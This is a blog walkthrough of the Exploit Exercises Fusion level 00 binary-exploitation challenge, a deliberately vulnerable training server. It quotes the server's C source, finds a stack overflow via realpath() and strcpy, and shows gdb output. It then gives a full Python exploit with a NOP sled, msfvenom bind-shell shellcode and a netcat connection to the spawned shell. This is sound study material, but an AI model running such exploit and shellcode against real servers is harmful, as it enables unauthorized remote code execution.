Exploit Exercise Binary Exploitation Fusion level 00

Namaste Friends,



Welcome Again to Bitforestinfo Blog. Well, Today's Post is Really Going to be very Interesting Because Today I am going to share my walkthrough experience of Exploit Exercise Fusion level 00 Challenge.
So, Let's start.

Hint


This is a simple introduction to get you warmed up. 
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a
 bad idea due to character restrictions due to realpath(). Instead, there is 
plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).


Source Code

#include "../common/common.c"    

int fix_path(char *path)
{
  char resolved[128]
  
  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

  fix_path(path);

  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);
  set_io(fd);

  parse_http_request(); 
}


Source Code Description


Well, after staring these codes for few minutes. My mind said that Its a server like program to process user provided http request. During execution this program waits for connection and after recieving new connection.parse_http_request() routine gets active and In the end, fix_path() function.

Vulnerable codes


Set 1:[Not Sure]

path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;  <---- May Be For Another Methods???? 




SET 2  <---[ Completely Sure]

  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved) 

Above code are the code that looks suspicious to me but To proceed further, we need to conform vulnerability.  So, After few testing codes and gdb analysis, I conformed that the second set is vulnerable.
Function realpath() is a Vulnerable Function.

Testing Code

fusion@fusion:~$ cat try.c 
#include <stdio.h>
#include <string.h>

int main(){
 char resolve[150];

 if (realpath(" HTTP/1.1 aaaaaaaaaaa",resolve)==NULL){
  printf("Fail %s\n", resolve);
 }else{
  printf("Bypass\n");
 }
 return 0;

}

Analysis of above testing code is left over user to understand because this testing code is really very simple to understand. Just run above codes. Hint : Buffer-overflow Vulnerability.


After few changes in testing codes I got below Error.

Gdb Output


Program received signal SIGSEGV, Segmentation fault.
0xcccccccc in ?? ()
(gdb) i r
eax            0x1 1
ecx            0xb7e568d0 -1209702192
edx            0xbffffa45 -1073743291
ebx            0xb7fceff4 -1208160268
esp            0xbffff8e0 0xbffff8e0
ebp            0xcccccccc 0xcccccccc
esi            0xbffffaf9 -1073743111
edi            0x8049f05 134520581
eip            0xcccccccc 0xcccccccc
eflags         0x10246 [ PF ZF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51


Solution


Now, I think its like a piece of cake to solve this challenge because we successfully detected vulnerability and All security features of these program is OFF.



#!/usr/bin/python

# import modules
import socket
import struct
import os

# target configurations
TARGET_IP = raw_input("[*] Insert Machine Address [Default: 192.168.43.166] : ") or '192.168.43.166'
TARGET_PORT = 20000


# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Creating Socket ..."

# Socket File
sf = s.makefile('rb')

# Connect To Target
s.connect((TARGET_IP, TARGET_PORT))

ebp = sf.read(len('[debug] buffer is at 0xbffff8f8 :-)\n'))
print ebp
ebp = ebp[ebp.find('0x'):-5] 


print "[+] Generating payload..."
payload = ''
payload+= 'GET '

# generated From Msfvenom
# msfvenom -p linux/x86/shell_bind_tcp
buf =  ""
buf += '\x90'*120            # NOP Sleds
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += "\xda\xcd\xb8\xbe\xd0\x1b\x82\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x14\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x5c"
buf += "\x25\x2a\x59\x57\x25\x1e\x1e\xc4\xc0\xa3\x29\x0b\xa4"
buf += "\xc2\xe4\x4b\x9e\x54\xa5\x23\x23\x69\x58\xef\x49\x79"
buf += "\x0b\x5f\x07\x98\xc1\x39\x4f\x96\x96\x4c\x2e\x2c\x24"
buf += "\x4a\x01\x4a\x87\xd2\x22\x23\x71\x1f\x24\xd0\x27\xf5"
buf += "\x1a\x8f\x1a\x89\x2c\x56\x5d\xe1\x81\x87\xee\x99\xb5"
buf += "\xf8\x72\x30\x28\x8e\x90\x92\xe7\x19\xb7\xa2\x03\xd7"
buf += "\xb8"
print "[+] Payload ready to dispatch."




#
# Trying To Find Offset
# 500 Words
# payload+= 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'

# Offset 139
print "[+] Assemble Payload"
payload+= '\x90'*135        # Nop Sled
payload+= 'b'*4             #struct.pack("I", 0xbffff8f8) # struct.pack("I", int(ebp)) # EBP
payload+= struct.pack("I", 0xbffff8dc+10) # 'aaaa'                       # this point is countering
payload+= buf
                                       # Instruction Pointer ---|
payload+= '\x90'*(1000-(143+len(buf))) # Nop Sled           <---|
payload+= ' HTTP/1.1\r\n'


print "[+] Payload Sent"
# Sending Payload
s.sendall(payload)

s.settimeout(3)
print "[+] Wait For Response"
try:
 print [sf.read(len('trying to access %s\n')+10)]
 print "[-] If You Are Reading This Message Then Probably Exploit failed."
 input("[-] Exit. Trying Again..")
 s.close()
except:
 print "[+] Starting Bind TCP Shell."
 print "[+] Use Commands Carefully."
 os.system('nc {} 4444'.format(TARGET_IP))


Yeah! We Won.

Feel Free To Comment below Appreciable Points.. Hahaha!

Share this

Related Posts

Previous
Next Post »